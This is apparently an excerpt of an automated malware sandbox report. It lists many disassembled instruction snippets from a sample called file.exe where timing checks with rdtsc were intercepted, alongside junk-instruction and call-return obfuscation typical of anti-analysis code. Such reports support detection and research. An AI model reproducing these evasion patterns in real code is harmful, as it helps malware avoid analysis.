Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10269D3 second address: 10269D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1026EEC second address: 1026EF2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1026FA6 second address: 1026FBC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], ebx 0x0000000a or edi, dword ptr [ebp+122D1C2Dh] 0x00000010 nop 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1026FBC second address: 1026FC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1026FC3 second address: 1026FF0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FC85CDF02B9h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jng 00007FC85CDF02A8h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push edx 0x00000018 pop edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1027A73 second address: 1027A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1027A79 second address: 1027A86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007FC85CDF02A6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1027A86 second address: 1027B12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d pushad 0x0000000e add dword ptr [ebp+122D2A26h], ecx 0x00000014 mov ax, E4DEh 0x00000018 popad 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ebp 0x0000001e call 00007FC85D338E28h 0x00000023 pop ebp 0x00000024 mov dword ptr [esp+04h], ebp 0x00000028 add dword ptr [esp+04h], 00000015h 0x00000030 inc ebp 0x00000031 push ebp 0x00000032 ret 0x00000033 pop ebp 0x00000034 ret 0x00000035 sub dword ptr [ebp+122D2612h], edx 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push ebx 0x00000040 call 00007FC85D338E28h 0x00000045 pop ebx 0x00000046 mov dword ptr [esp+04h], ebx 0x0000004a add dword ptr [esp+04h], 0000001Dh 0x00000052 inc ebx 0x00000053 push ebx 0x00000054 ret 0x00000055 pop ebx 0x00000056 ret 0x00000057 add esi, 0E39DE41h 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007FC85D338E36h 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1028B6E second address: 1028B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1028B73 second address: 1028B79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1029F1A second address: 1029F2C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC85CDF02A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007FC85CDF02A6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1029F2C second address: 1029FB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007FC85D338E2Dh 0x00000011 je 00007FC85D338E28h 0x00000017 push esi 0x00000018 pop esi 0x00000019 popad 0x0000001a nop 0x0000001b push 00000000h 0x0000001d push edx 0x0000001e call 00007FC85D338E28h 0x00000023 pop edx 0x00000024 mov dword ptr [esp+04h], edx 0x00000028 add dword ptr [esp+04h], 0000001Dh 0x00000030 inc edx 0x00000031 push edx 0x00000032 ret 0x00000033 pop edx 0x00000034 ret 0x00000035 push ecx 0x00000036 pop edi 0x00000037 push 00000000h 0x00000039 mov edi, dword ptr [ebp+122D332Eh] 0x0000003f mov edi, dword ptr [ebp+122D377Fh] 0x00000045 push 00000000h 0x00000047 pushad 0x00000048 stc 0x00000049 jmp 00007FC85D338E37h 0x0000004e popad 0x0000004f xchg eax, ebx 0x00000050 pushad 0x00000051 push eax 0x00000052 push edx 0x00000053 push esi 0x00000054 pop esi 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1029FB8 second address: 1029FBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 102A9A9 second address: 102A9AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 102B425 second address: 102B42F instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC85CDF02A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 102B42F second address: 102B47F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 ja 00007FC85D338E26h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f or dword ptr [ebp+122D2612h], ecx 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007FC85D338E28h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 00000017h 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 mov edi, dword ptr [ebp+122D319Ch] 0x00000037 push 00000000h 0x00000039 push eax 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FC85D338E2Eh 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 102BEE6 second address: 102BEF3 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC85CDF02A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 102F165 second address: 102F177 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jns 00007FC85D338E26h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 102F771 second address: 102F79B instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC85CDF02A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC85CDF02B9h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 102F79B second address: 102F79F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 102F79F second address: 102F7A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 102F7A5 second address: 102F82D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007FC85D338E28h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 movsx edi, cx 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push ebp 0x0000002c call 00007FC85D338E28h 0x00000031 pop ebp 0x00000032 mov dword ptr [esp+04h], ebp 0x00000036 add dword ptr [esp+04h], 0000001Ch 0x0000003e inc ebp 0x0000003f push ebp 0x00000040 ret 0x00000041 pop ebp 0x00000042 ret 0x00000043 jmp 00007FC85D338E2Eh 0x00000048 push 00000000h 0x0000004a mov edi, 24257E26h 0x0000004f xchg eax, esi 0x00000050 jo 00007FC85D338E34h 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 102F82D second address: 102F833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 103083C second address: 1030845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1030845 second address: 1030849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1037E99 second address: 1037EC5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC85D338E37h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC85D338E2Fh 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE69F7 second address: FE6A17 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jo 00007FC85CDF02A6h 0x00000009 jne 00007FC85CDF02A6h 0x0000000f pop esi 0x00000010 push edx 0x00000011 jmp 00007FC85CDF02ADh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 102FAA8 second address: 102FAAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10309D6 second address: 10309DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 102FAAC second address: 102FADE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC85D338E35h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1036179 second address: 1036187 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007FC85CDF02A6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1038653 second address: 103865D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FC85D338E26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10309DC second address: 10309E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1036187 second address: 103618B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1039600 second address: 1039621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC85CDF02B0h 0x0000000a popad 0x0000000b push eax 0x0000000c jbe 00007FC85CDF02B0h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10309E1 second address: 10309EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FC85D338E26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1039621 second address: 10396BA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 xor bl, FFFFFFB4h 0x0000000a push ecx 0x0000000b mov ebx, dword ptr [ebp+122D3707h] 0x00000011 pop ebx 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov ebx, 43F12AF0h 0x0000001e sub dword ptr [ebp+122D2D40h], ecx 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b push 00000000h 0x0000002d push eax 0x0000002e call 00007FC85CDF02A8h 0x00000033 pop eax 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 add dword ptr [esp+04h], 0000001Dh 0x00000040 inc eax 0x00000041 push eax 0x00000042 ret 0x00000043 pop eax 0x00000044 ret 0x00000045 mov eax, dword ptr [ebp+122D0BB1h] 0x0000004b push 00000000h 0x0000004d push ecx 0x0000004e call 00007FC85CDF02A8h 0x00000053 pop ecx 0x00000054 mov dword ptr [esp+04h], ecx 0x00000058 add dword ptr [esp+04h], 0000001Dh 0x00000060 inc ecx 0x00000061 push ecx 0x00000062 ret 0x00000063 pop ecx 0x00000064 ret 0x00000065 mov dword ptr [ebp+122D3368h], eax 0x0000006b mov ebx, dword ptr [ebp+122D3483h] 0x00000071 push FFFFFFFFh 0x00000073 mov dword ptr [ebp+122D2A2Bh], esi 0x00000079 nop 0x0000007a push eax 0x0000007b push eax 0x0000007c push edx 0x0000007d jng 00007FC85CDF02A6h 0x00000083 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 103B7FC second address: 103B800 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10309EB second address: 1030A71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85CDF02B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+124679D8h], ebx 0x00000014 push dword ptr fs:[00000000h] 0x0000001b jnl 00007FC85CDF02BEh 0x00000021 jmp 00007FC85CDF02B8h 0x00000026 mov dword ptr fs:[00000000h], esp 0x0000002d push 00000000h 0x0000002f push ebx 0x00000030 call 00007FC85CDF02A8h 0x00000035 pop ebx 0x00000036 mov dword ptr [esp+04h], ebx 0x0000003a add dword ptr [esp+04h], 00000017h 0x00000042 inc ebx 0x00000043 push ebx 0x00000044 ret 0x00000045 pop ebx 0x00000046 ret 0x00000047 mov ebx, eax 0x00000049 mov eax, dword ptr [ebp+122D031Dh] 0x0000004f add dword ptr [ebp+122D25E5h], ebx 0x00000055 push FFFFFFFFh 0x00000057 mov dword ptr [ebp+12451768h], esi 0x0000005d push eax 0x0000005e pushad 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 103B800 second address: 103B822 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC85D338E26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edi 0x0000000d pushad 0x0000000e jmp 00007FC85D338E32h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1030A71 second address: 1030A75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1042C23 second address: 1042C27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 103EA86 second address: 103EA8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 103FC1A second address: 103FC33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E30h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1089428 second address: 1089432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FC85CDF02A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1089432 second address: 1089438 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1089438 second address: 1089452 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push esi 0x00000006 pop esi 0x00000007 jnc 00007FC85CDF02A6h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jnp 00007FC85CDF02AEh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1089452 second address: 108945E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 108945E second address: 108946D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85CDF02ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 108946D second address: 1089477 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC85D338E2Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FED26A second address: FED270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FED270 second address: FED276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1090BAC second address: 1090BB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE3429 second address: FE342D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 109141D second address: 1091421 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1099151 second address: 1099171 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FC85D338E40h 0x0000000f push eax 0x00000010 jp 00007FC85D338E26h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1099171 second address: 109917E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jbe 00007FC85CDF02ACh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 109739A second address: 10973B5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC85D338E26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC85D338E2Fh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10973B5 second address: 10973D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85CDF02AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007FC85CDF02A6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10973D1 second address: 10973E1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC85D338E26h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10973E1 second address: 10973E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10973E5 second address: 10973F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10973F6 second address: 109740B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jg 00007FC85CDF02A6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f ja 00007FC85CDF02A6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 109740B second address: 109740F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1097559 second address: 1097583 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FC85CDF02AFh 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC85CDF02B2h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1097583 second address: 1097589 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 109794C second address: 109795C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC85CDF02ACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1097D78 second address: 1097D93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FC85D338E26h 0x0000000a jmp 00007FC85D338E30h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1098192 second address: 1098196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1098196 second address: 10981AF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FC85D338E34h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 109889E second address: 10988AE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnp 00007FC85CDF02A6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1096ED1 second address: 1096EF0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC85D338E2Ah 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 jmp 00007FC85D338E2Fh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10A028F second address: 10A0295 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10A0295 second address: 10A02B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E2Bh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007FC85D338E26h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10A02B0 second address: 10A02B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10A02B4 second address: 10A02B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10A2DF3 second address: 10A2E1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85CDF02B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e pushad 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10A2E1D second address: 10A2E56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007FC85D338E4Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007FC85D338E26h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10A2E56 second address: 10A2E5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10A30EC second address: 10A30F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10A30F1 second address: 10A30F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10AD952 second address: 10AD95A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10AD95A second address: 10AD97F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC85CDF02B8h 0x0000000c jo 00007FC85CDF02A6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10AF4FA second address: 10AF4FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
